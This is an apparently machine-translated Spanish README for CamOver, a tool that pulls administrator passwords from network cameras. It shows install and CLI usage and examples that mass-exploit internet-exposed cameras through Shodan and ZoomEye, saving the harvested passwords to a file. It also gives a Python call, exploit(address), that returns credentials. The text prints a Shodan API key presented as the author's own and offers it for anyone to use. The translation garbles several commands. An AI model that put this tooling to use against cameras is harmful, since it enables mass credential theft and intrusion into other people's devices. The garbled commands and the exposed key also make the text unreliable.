
CamOver es una herramienta de explotación de la cámara que puede revelar la contraseña de administrador de la cámara de red.
propiedades
- Utiliza puntos débiles en los modelos de cámara más comunes, como
CCTV
,GoAhead
yNetwave
. - Optimizado para usar varias cámaras al mismo tiempo de una lista con subprocesos activados.
- CLI y API fáciles de usar.
instalación
pip3 instalar git + https: //github.com/EntySec/CamOver
Uso básico
Para usarlo, simplemente escriba camover
en tu terminal.
Uso: Camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [–shodan SHODAN]
[–zoomeye ZOOMEYE] [-p PAGES]
CamOver es una herramienta de explotación de cámaras que permite revelar las cámaras de red.
Contraseña de administrador.
argumentos opcionales:
-h, –help Muestra este mensaje de ayuda y sale
-t, –threads Usa hilos para un trabajo más rápido.
-o SALIDA, –salida SALIDA
Envíe el resultado a un archivo.
-i ENTRADA, –entrada ENTRADA
Archivo de entrada con direcciones.
-a DIRECCIÓN, -Dirección DIRECCIÓN
Dirección única.
–Shodan SHODAN Clave API de Shodan para la explotación de dispositivos a través de Internet.
–Zoomeye ZOOMEYE Clave API de ZoomEye para usar dispositivos a través de Internet.
-p PÁGINAS, –PÁGINAS PÁGINAS
Número de páginas que le gustaría recibir de ZoomEye.
Ejemplos de
Uso de una sola cámara
Hackeamos mi cámara solo por diversión.
Camover -a 192.168.99.100
Explotación de cámaras de Internet
Intentemos usar el motor de búsqueda de Shodan para aprovechar las cámaras en Internet, también las usaremos -t
para una utilización rápida.
Camover -t -shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
NOTA: Clave de API de Shodan dada (PSKINdQe1GyxGgecYz2191H2JoS9qvgD
) es mi clave de API PRO, puede usar esta clave o la suya propia. Utilice todos nuestros recursos de forma gratuita 🙂
Explotación de cámaras desde el archivo de entrada
Intentemos usar la base de datos abierta de cámaras. -t
para una utilización rápida.
camover -t -i camera.txt -o passwords.txt
NOTA: Utiliza todas las cámaras en cameras.txt
Enumérelos por dirección y guarde todas las contraseñas recibidas como passwords.txt
.
Uso de API
CamOver también tiene su propia API de Python a la que se puede llamar importando CamOver en su código.
de Camover importar CamOver
Funciones básicas
Existen todas las funciones básicas de CamOver que se pueden utilizar para aprovechar una cámara en particular.
exploit(address)
– Explotación de una sola cámara según la dirección indicada.
Ejemplos de
Uso de una sola cámara
de Camover importar CamOver
Camover = CamOver ()
creds = camover.exploit (‘192.168.99.100’)
Imprimir (crédito)